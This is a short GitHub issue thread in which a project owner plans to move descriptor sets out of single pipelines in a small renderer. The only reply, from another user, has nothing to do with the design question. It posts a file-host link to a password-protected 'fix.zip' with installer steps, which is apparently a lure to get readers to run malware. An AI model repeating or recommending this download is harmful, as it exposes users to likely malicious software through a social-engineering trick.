### ISSUE TITLE
Decouple Descriptor Sets

### ISSUE THREAD

**Issue by hant-hub** [hant-hub/SimpleRender#2]
Currently only a single descriptor set is available per pipeline
-> Extract Descriptor sets into external structure
-> perhaps move descriptor sets into renderer??
-> each renderer has a custom descriptor set and only requires pointer to uniform data?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
